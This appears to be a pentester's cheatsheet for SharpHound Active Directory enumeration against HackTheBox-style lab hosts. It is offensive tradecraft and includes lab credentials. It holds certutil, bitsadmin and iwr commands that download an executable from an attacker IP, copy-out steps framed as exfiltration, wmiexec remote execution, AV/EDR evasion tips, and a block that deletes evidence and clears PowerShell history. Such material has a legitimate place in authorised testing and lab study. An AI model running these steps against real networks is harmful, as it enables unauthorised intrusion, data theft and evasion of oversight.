sharphound.md (18905B)
1 --- 2 title: "SharpHound_" 3 description: "β οΈ Note: Make sure your SharpHound version matches your BloodHound version! You can check the compatible version in BloodHound CE's web UI under Settingsβ¦" 4 category: active-directory 5 subcategory: "Tooling & Recon" 6 tags: ["active-directory", "adcs", "privilege-escalation"] 7 tools: ["Impacket", "BloodHound", "SharpHound", "Evil-WinRM", "Certify"] 8 difficulty: intermediate 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/SharpHound_Cheatsheet.md" 11 --- 12 # π©Έ SharpHound.exe Cheatsheet 13 14 > **Complete guide to using SharpHound for Active Directory enumeration** 15 16 --- 17 18 ## π Table of Contents 19 20 - [Overview](#-overview) 21 - [Upload Methods](#-upload-methods-to-target) 22 - [Basic Usage](#-basic-usage) 23 - [Collection Methods](#-collection-methods) 24 - [Advanced Options](#-advanced-options) 25 - [BloodHound Python Equivalent](#-bloodhound-python-equivalent) 26 - [Download Results](#-download-results) 27 - [Troubleshooting](#-troubleshooting) 28 29 --- 30 31 ## π― Overview 32 33 **SharpHound** is the official data collector for BloodHound written in C#. It enumerates Active Directory environments to map attack paths and privilege escalation opportunities. 34 35 ### Key Features 36 - β Native Windows execution (no dependencies) 37 - β Multiple collection methods 38 - β LDAP and API-based enumeration 39 - β Stealth and performance options 40 - β Outputs ZIP files for BloodHound ingestion 41 42 ### Important Version Information 43 44 **SharpHound Versions:** 45 - **Latest:** Version 2.8.0 (as of November 2025) 46 - **Compatibility:** Designed for BloodHound Community Edition (CE) 47 - **Download:** Always get the latest from [GitHub Releases](https://github.com/SpecterOps/SharpHound/releases) 48 - **Target Framework:** .NET 4.6.2 49 50 β οΈ **Note:** Make sure your SharpHound version matches your BloodHound version! You can check the compatible version in BloodHound CE's web UI under Settings β Download Collectors. 51 52 --- 53 54 ## π€ Upload Methods to Target 55 56 ### Method 1: SMB Server (impacket-smbserver) 57 58 **On Kali Linux:** 59 ```bash 60 # Start SMB server in directory containing SharpHound.exe 61 sudo impacket-smbserver share . -smb2support -username user -password pass 62 63 # Or without authentication (less secure) 64 sudo impacket-smbserver share . -smb2support 65 ``` 66 67 **On Target Windows:** 68 ```powershell 69 # With authentication 70 net use \\10.10.14.5\share /user:user pass 71 copy \\10.10.14.5\share\SharpHound.exe . 72 73 # Without authentication 74 copy \\10.10.14.5\share\SharpHound.exe . 75 76 # Alternative: Run directly from SMB share 77 \\10.10.14.5\share\SharpHound.exe -c All 78 ``` 79 80 --- 81 82 ### Method 2: Python Web Server 83 84 **On Kali Linux:** 85 ```bash 86 # Python 3 (default in Kali) 87 python3 -m http.server 8000 88 89 # Python 3 with specific IP binding 90 python3 -m http.server 8000 --bind 10.10.14.5 91 ``` 92 93 **On Target Windows:** 94 ```powershell 95 # PowerShell Download 96 Invoke-WebRequest -Uri http://10.10.14.5:8000/SharpHound.exe -OutFile SharpHound.exe 97 98 # Short form 99 iwr -uri http://10.10.14.5:8000/SharpHound.exe -o SharpHound.exe 100 101 # Certutil (alternative method) 102 certutil -urlcache -f http://10.10.14.5:8000/SharpHound.exe SharpHound.exe 103 104 # BITSAdmin 105 bitsadmin /transfer mydownload /download /priority high http://10.10.14.5:8000/SharpHound.exe C:\Temp\SharpHound.exe 106 ``` 107 108 --- 109 110 ### Method 3: WinRM Upload (evil-winrm) 111 112 **Using evil-winrm:** 113 ```bash 114 # Connect to target 115 evil-winrm -i 10.10.11.41 -u judith.mader -p judith09 116 117 # Once connected, upload SharpHound 118 upload /path/to/SharpHound.exe 119 ``` 120 121 **Within evil-winrm session:** 122 ```powershell 123 *Evil-WinRM* PS C:\Users\judith.mader\Documents> upload /opt/SharpHound.exe 124 *Evil-WinRM* PS C:\Users\judith.mader\Documents> .\SharpHound.exe -c All 125 ``` 126 127 --- 128 129 ### Method 4: Base64 Encoding (Small Files) 130 131 **On Kali Linux:** 132 ```bash 133 # Encode SharpHound 134 base64 -w 0 SharpHound.exe > sharphound_b64.txt 135 ``` 136 137 **On Target Windows:** 138 ```powershell 139 # Decode and save (paste base64 string) 140 $b64 = "TVqQAAMAAAAEAAAA..." # Your base64 string 141 [IO.File]::WriteAllBytes("SharpHound.exe", [Convert]::FromBase64String($b64)) 142 ``` 143 144 --- 145 146 ## π Basic Usage 147 148 ### Standard Execution 149 150 ```powershell 151 # Run all collection methods (most common) 152 .\SharpHound.exe --CollectionMethods All 153 154 # Short form also works 155 .\SharpHound.exe -c All 156 157 # Run with specific collection methods 158 .\SharpHound.exe -c Session,LoggedOn 159 160 # Specify domain explicitly 161 .\SharpHound.exe -c All -d certified.htb 162 163 # Custom output directory 164 .\SharpHound.exe -c All --OutputDirectory C:\Temp 165 166 # Custom output prefix 167 .\SharpHound.exe -c All --OutputPrefix custom_name 168 169 # Automatically create ZIP file (recommended) 170 .\SharpHound.exe -c All --ZipFileName output.zip 171 ``` 172 173 --- 174 175 ## π― Collection Methods 176 177 | Method | Description | Usage | 178 |--------|-------------|-------| 179 | **All** | Runs all collection methods except LoggedOn | `-c All` | 180 | **Default** | Group, LocalAdmin, Session, Trusts | `-c Default` | 181 | **DCOnly** | LDAP-only, no computer queries | `-c DCOnly` | 182 | **Group** | Group memberships | `-c Group` | 183 | **LocalAdmin** | Local admin rights | `-c LocalAdmin` | 184 | **Session** | Active sessions | `-c Session` | 185 | **Trusts** | Domain trusts | `-c Trusts` | 186 | **ACL** | Object permissions | `-c ACL` | 187 | **Container** | OU structure | `-c Container` | 188 | **GPOLocalGroup** | GPO-enforced groups | `-c GPOLocalGroup` | 189 | **SPNTargets** | Service Principal Names | `-c SPNTargets` | 190 | **LoggedOn** | Logged on users (privileged) | `-c LoggedOn` | 191 | **ObjectProps** | Object properties | `-c ObjectProps` | 192 | **RDP** | RDP access rights | `-c RDP` | 193 | **DCOM** | DCOM access rights | `-c DCOM` | 194 | **PSRemote** | PSRemote access | `-c PSRemote` | 195 | **CARegistry** | AD CS registry keys | `-c CARegistry` | 196 | **DCRegistry** | DC registry data | `-c DCRegistry` | 197 198 ### Combining Methods 199 200 ```powershell 201 # Multiple methods 202 .\SharpHound.exe -c Group,Session,Trusts 203 204 # Comprehensive collection 205 .\SharpHound.exe -c All 206 207 # LDAP-only (stealth, no computer connections) 208 .\SharpHound.exe -c DCOnly 209 ``` 210 211 --- 212 213 ## βοΈ Advanced Options 214 215 ### Domain Controller Specification 216 217 ```powershell 218 # Specify domain controller by IP 219 .\SharpHound.exe -c All -d certified.htb --DomainController 10.10.11.41 220 221 # Specify by hostname 222 .\SharpHound.exe -c All -d certified.htb --DomainController DC01.certified.htb 223 224 # Multiple domains 225 .\SharpHound.exe -c All -d certified.htb,external.local 226 ``` 227 228 ### Authentication Options 229 230 ```powershell 231 # Use LDAP credentials (alternate to current user context) 232 .\SharpHound.exe -c All --LdapUsername judith.mader --LdapPassword judith09 233 234 # Run with different user context using runas 235 runas /user:certified.htb\judith.mader /netonly cmd 236 # Then run SharpHound from that context 237 .\SharpHound.exe -c All -d certified.htb 238 239 # Override username for NetSessionEnum 240 .\SharpHound.exe -c Session --OverrideUserName judith.mader 241 ``` 242 243 ### Performance & Stealth 244 245 ```powershell 246 # Stealth mode (slower, LDAP-focused, removes noisy methods) 247 .\SharpHound.exe -c All --Stealth 248 249 # Throttle requests (milliseconds between requests) 250 .\SharpHound.exe -c All --Throttle 1000 251 252 # Jitter (randomize delay, percentage) 253 .\SharpHound.exe -c All --Jitter 20 254 255 # Skip port scan (don't check if 445 is open) 256 .\SharpHound.exe -c All --SkipPortCheck 257 258 # No save cache 259 .\SharpHound.exe -c All --NoSaveCache 260 261 # Disable certificate verification (LDAPS) 262 .\SharpHound.exe -c All --DisableCertVerification 263 264 # Disable Kerberos signing/sealing (not recommended) 265 .\SharpHound.exe -c All --DisableSigning 266 ``` 267 268 ### LDAP Options 269 270 ```powershell 271 # Specify LDAP port (default 389) 272 .\SharpHound.exe -c All --LdapPort 389 273 274 # Use secure LDAP (port 636) 275 .\SharpHound.exe -c All --SecureLDAP 276 277 # Combine LDAPS with specific port 278 .\SharpHound.exe -c All --LdapPort 636 --SecureLDAP 279 280 # Use Global Catalog port 281 .\SharpHound.exe -c All --LdapPort 3268 282 ``` 283 284 ### Loop Collection 285 286 ```powershell 287 # Loop collection (great for session gathering) 288 # Loops for 2 hours, creating a ZIP file after each iteration 289 .\SharpHound.exe -c Session --Loop --Loopduration 02:00:00 290 291 # Loop with interval between iterations 292 # Runs for 3 hours, waits 10 minutes between each collection 293 .\SharpHound.exe -c Session --Loop --Loopduration 03:00:00 --LoopInterval 00:10:00 294 ``` 295 296 ### Exclusions & Filters 297 298 ```powershell 299 # Exclude domain controllers from enumeration 300 .\SharpHound.exe -c All --ExcludeDCs 301 302 # Skip registry-based enumeration 303 .\SharpHound.exe -c All --SkipRegistryLoggedOn 304 305 # Use specific computer list file 306 .\SharpHound.exe -c All --ComputerFile C:\computers.txt 307 308 # LDAP filter for computers 309 .\SharpHound.exe -c All --LdapFilter "(operatingSystem=*Server*)" 310 ``` 311 312 ### Output Options 313 314 ```powershell 315 # Prettify JSON output (larger files, more readable) 316 .\SharpHound.exe -c All --PrettyPrint 317 318 # Track computer connection status to CSV 319 .\SharpHound.exe -c All --TrackComputerCalls 320 321 # Random file names for output 322 .\SharpHound.exe -c All --RandomFilenames 323 ``` 324 325 --- 326 327 ## π BloodHound Python Equivalent 328 329 ### Your Original Command 330 331 ```bash 332 sudo bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip 333 ``` 334 335 ### SharpHound Equivalent 336 337 **Option 1: Direct Execution (Already authenticated as judith.mader)** 338 339 ```powershell 340 # If you're already authenticated as judith.mader on Windows 341 .\SharpHound.exe -c All -d certified.htb --DomainController 10.10.11.41 --ZipFileName certified_bloodhound.zip 342 ``` 343 344 **Option 2: Using LDAP Credentials** 345 346 ```powershell 347 # Use alternate credentials via LDAP authentication 348 .\SharpHound.exe -c All -d certified.htb --DomainController 10.10.11.41 --LdapUsername judith.mader --LdapPassword judith09 349 ``` 350 351 **Option 3: Using RunAs with Network Credentials** 352 353 ```powershell 354 # Run cmd with network credentials 355 runas /user:certified.htb\judith.mader /netonly cmd 356 357 # In the new cmd window 358 .\SharpHound.exe -c All -d certified.htb --DomainController 10.10.11.41 359 ``` 360 361 **Option 4: Using evil-winrm** 362 363 ```bash 364 # From Kali, connect via WinRM 365 evil-winrm -i 10.10.11.41 -u judith.mader -p judith09 366 367 # Upload and run SharpHound 368 upload /path/to/SharpHound.exe 369 .\SharpHound.exe -c All -d certified.htb --DomainController 10.10.11.41 370 ``` 371 372 **Option 5: Using Impacket's psexec/wmiexec** 373 374 ```bash 375 # Execute SharpHound remotely 376 impacket-wmiexec certified.htb/judith.mader:judith09@10.10.11.41 "C:\Temp\SharpHound.exe -c All" 377 ``` 378 379 ### Parameter Mapping 380 381 | bloodhound-python | SharpHound.exe | Description | 382 |-------------------|----------------|-------------| 383 | `-c all` | `-c All` or `--CollectionMethods All` | Collection method | 384 | `-u judith.mader` | `--LdapUsername judith.mader` | Username (or use current context) | 385 | `-p judith09` | `--LdapPassword judith09` | Password (or use current context) | 386 | `-d certified.htb` | `-d certified.htb` or `--Domain certified.htb` | Domain | 387 | `-ns 10.10.11.41` | `--DomainController 10.10.11.41` | Domain controller | 388 | `--zip` | `--ZipFileName output.zip` | ZIP output (default behavior) | 389 390 --- 391 392 ## π₯ Download Results 393 394 ### Method 1: SMB Server (Retrieve Files) 395 396 ```powershell 397 # On Windows, copy results back 398 copy 20241127*.zip \\10.10.14.5\share\ 399 ``` 400 401 ### Method 2: Evil-WinRM Download 402 403 ```powershell 404 # In evil-winrm session 405 download C:\Path\To\20241127_BloodHound.zip 406 ``` 407 408 ### Method 3: Base64 Encoding (Small ZIP files) 409 410 **On Windows:** 411 ```powershell 412 # Encode the ZIP file 413 $b64 = [Convert]::ToBase64String([IO.File]::ReadAllBytes("20241127_BloodHound.zip")) 414 $b64 | Out-File -Encoding ASCII bloodhound_b64.txt 415 ``` 416 417 **On Kali:** 418 ```bash 419 # Copy the base64 string and decode 420 base64 -d bloodhound_b64.txt > bloodhound_data.zip 421 ``` 422 423 ### Method 4: Python Web Server Upload 424 425 **On Windows (with Python):** 426 ```powershell 427 # Start simple HTTP server 428 python -m http.server 8080 429 430 # Then download from Kali 431 wget http://10.10.11.41:8080/20241127_BloodHound.zip 432 ``` 433 434 --- 435 436 ## π₯ Common Usage Scenarios 437 438 ### Scenario 1: Quick Full Enumeration 439 440 ```powershell 441 # Complete enumeration with ZIP output 442 .\SharpHound.exe -c All -d certified.htb --ZipFileName certified_full.zip 443 ``` 444 445 ### Scenario 2: Session Hunting 446 447 ```powershell 448 # Loop session collection for 2 hours, checking every 10 minutes 449 .\SharpHound.exe -c Session --Loop --Loopduration 02:00:00 --LoopInterval 00:10:00 450 ``` 451 452 ### Scenario 3: Stealth Enumeration 453 454 ```powershell 455 # Stealth mode (LDAP-focused, removes noisy methods like LoggedOn) 456 .\SharpHound.exe -c All --Stealth 457 458 # Manual stealth (custom throttling and jitter) 459 .\SharpHound.exe -c Group,ACL,ObjectProps --Throttle 2000 --Jitter 25 460 ``` 461 462 ### Scenario 4: LDAP-Only Collection (No Computer Connections) 463 464 ```powershell 465 # DCOnly - only queries domain controller via LDAP 466 .\SharpHound.exe -c DCOnly -d certified.htb 467 468 # Exclude DCs from computer enumeration 469 .\SharpHound.exe -c All --ExcludeDCs 470 ``` 471 472 ### Scenario 5: Specific Data Only 473 474 ```powershell 475 # Only collect groups and trusts 476 .\SharpHound.exe -c Group,Trusts -d certified.htb 477 478 # Default collection (Group, LocalAdmin, Session, Trusts) 479 .\SharpHound.exe -c Default 480 ``` 481 482 ### Scenario 6: Multi-Domain Environment 483 484 ```powershell 485 # Enumerate trust relationships first 486 .\SharpHound.exe -c Trusts 487 488 # Then enumerate specific domains 489 .\SharpHound.exe -c All -d certified.htb,child.certified.htb 490 491 # Or enumerate entire forest 492 .\SharpHound.exe -c All --SearchForest 493 ``` 494 495 ### Scenario 7: Using LDAPS (Secure LDAP) 496 497 ```powershell 498 # Use LDAPS for encrypted communication 499 .\SharpHound.exe -c All --SecureLDAP -d certified.htb 500 ``` 501 502 --- 503 504 ## π Troubleshooting 505 506 ### Common Errors 507 508 **"Could not resolve domain"** 509 ```powershell 510 # Solution: Specify domain controller explicitly 511 .\SharpHound.exe -c All -d certified.htb --DomainController 10.10.11.41 512 ``` 513 514 **"Access Denied"** 515 ```powershell 516 # Verify credentials and permissions 517 whoami /all 518 519 # Check domain connectivity 520 nltest /dsgetdc:certified.htb 521 522 # Try using LDAP credentials 523 .\SharpHound.exe -c All --LdapUsername judith.mader --LdapPassword judith09 524 ``` 525 526 **"LDAP connection failed"** 527 ```powershell 528 # Try different LDAP port (Global Catalog) 529 .\SharpHound.exe -c All --LdapPort 3268 530 531 # Try plain LDAP 532 .\SharpHound.exe -c All --LdapPort 389 533 534 # Try LDAPS (secure) 535 .\SharpHound.exe -c All --SecureLDAP 536 537 # Disable signing (not recommended, but may help) 538 .\SharpHound.exe -c All --DisableSigning 539 ``` 540 541 **No output file generated** 542 ```powershell 543 # Specify output directory with write permissions 544 .\SharpHound.exe -c All --OutputDirectory C:\Temp 545 546 # Check for actual errors in console output 547 # Ensure you have permissions to current directory 548 ``` 549 550 **"Port 445 not open" errors** 551 ```powershell 552 # Skip port checks (useful in restricted environments) 553 .\SharpHound.exe -c All --SkipPortCheck 554 ``` 555 556 ### Performance Issues 557 558 ```powershell 559 # Add throttling (wait time between requests) 560 .\SharpHound.exe -c All --Throttle 500 --Jitter 15 561 562 # Reduce to LDAP-only collection 563 .\SharpHound.exe -c DCOnly 564 ``` 565 566 ### Detection/AV Issues 567 568 ```powershell 569 # Use stealth mode 570 .\SharpHound.exe -c All --Stealth 571 572 # Run from memory (use PowerShell wrapper) 573 Import-Module .\SharpHound.ps1 574 Invoke-BloodHound -CollectionMethod All 575 576 # Obfuscate or recompile SharpHound from source 577 ``` 578 579 --- 580 581 ## π Output Files 582 583 SharpHound generates the following files: 584 585 | File | Description | 586 |------|-------------| 587 | `YYYYMMDDHHMMSS_BloodHound.zip` | Main output (import to BloodHound) | 588 | `YYYYMMDDHHMMSS_computers.json` | Computer objects | 589 | `YYYYMMDDHHMMSS_users.json` | User objects | 590 | `YYYYMMDDHHMMSS_groups.json` | Group objects | 591 | `YYYYMMDDHHMMSS_domains.json` | Domain information | 592 | `YYYYMMDDHHMMSS_gpos.json` | Group Policy Objects | 593 | `YYYYMMDDHHMMSS_ous.json` | Organizational Units | 594 | `YYYYMMDDHHMMSS_containers.json` | Container objects | 595 596 **Import to BloodHound:** 597 ```bash 598 # On Kali, start BloodHound 599 sudo neo4j start 600 bloodhound 601 602 # Upload the ZIP file through the GUI 603 # Or use bloodhound-python to directly upload 604 ``` 605 606 --- 607 608 ## π Useful Resources 609 610 - **SharpHound GitHub (Official)**: https://github.com/SpecterOps/SharpHound 611 - **BloodHound CE Documentation**: https://bloodhound.specterops.io/ 612 - **SharpHound Flags Reference**: https://bloodhound.specterops.io/collect-data/ce-collection/sharphound-flags 613 - **Download SharpHound**: https://github.com/SpecterOps/SharpHound/releases 614 - **BloodHound GitHub**: https://github.com/SpecterOps/BloodHound 615 - **SpecterOps Blog**: https://posts.specterops.io/ (latest research and updates) 616 - **BloodHound Slack**: https://bloodhoundgang.herokuapp.com/ (community support) 617 618 ### Alternative Collectors 619 - **RustHound**: Rust-based collector (cross-platform, AV evasion) 620 - **AzureHound**: Azure AD/Entra ID collector 621 - **SharpHound.ps1**: PowerShell wrapper for in-memory execution 622 623 --- 624 625 ## π‘ Pro Tips 626 627 1. **Always create ZIP files** - Use `--ZipFileName output.zip` for easier exfiltration and import 628 2. **Use loop collection for sessions** - Session data changes frequently; loop for better coverage 629 3. **Start with Default or All collection** - Get comprehensive data first, then target specific areas 630 4. **Check SharpHound version compatibility** - Match SharpHound version to your BloodHound instance 631 5. **Use --Stealth for red teams** - Automatically removes noisy collection methods 632 6. **Leverage --SearchForest** - Enumerate all domains in forest automatically (requires trust) 633 7. **Time your collection wisely** - Run during business hours for more active sessions 634 8. **Use LDAPS when possible** - `--SecureLDAP` encrypts LDAP traffic 635 9. **Consider AV/EDR detection** - SharpHound is heavily signatured; consider obfuscation 636 10. **Clean up after yourself** - Delete SharpHound and output files during operations 637 11. **Document your collection** - Note which methods were used and when 638 12. **Use --LdapUsername/--LdapPassword** - When you can't use runas or current context 639 13. **Combine with other tools** - Use with PowerView, ADRecon, Certify for full coverage 640 14. **Review collection methods** - Not all methods are needed; `DCOnly` is great for stealth 641 642 ### Advanced Tips 643 644 - **Registry-based collection** is noisy - Consider excluding with `--SkipRegistryLoggedOn` 645 - **Computer file lists** work great - Use `--ComputerFile` to target specific systems 646 - **Global Catalog port (3268)** can sometimes bypass restrictions 647 - **TrackComputerCalls** helps identify connectivity issues 648 - **RandomFilenames** can help avoid simple file-based detections 649 650 --- 651 652 ## β οΈ Operational Security 653 654 ```powershell 655 # Delete evidence after exfiltration 656 del SharpHound.exe 657 del *_BloodHound.zip 658 del *_computers.json 659 del *_users.json 660 # ... delete all output files 661 662 # Clear PowerShell history 663 Clear-History 664 Remove-Item (Get-PSReadlineOption).HistorySavePath 665 666 # Check for running processes 667 Get-Process | Where-Object {$_.ProcessName -like "*sharp*"} 668 ``` 669 670 --- 671 672 **Created by NetRunner | For Ethical Hacking & Penetration Testing** ππ 673 674 675 676 ## SharpHound.ps1 677 ```powershell 678 # After uploading SharpHound.ps1: 679 Import-Module .\SharpHound.ps1 680 Invoke-BloodHound -CollectionMethod All -Domain htb.local -DomainController 10.129.15.16 -LDAPUser svc-alfresco -LDAPPass s3rvice 681 ```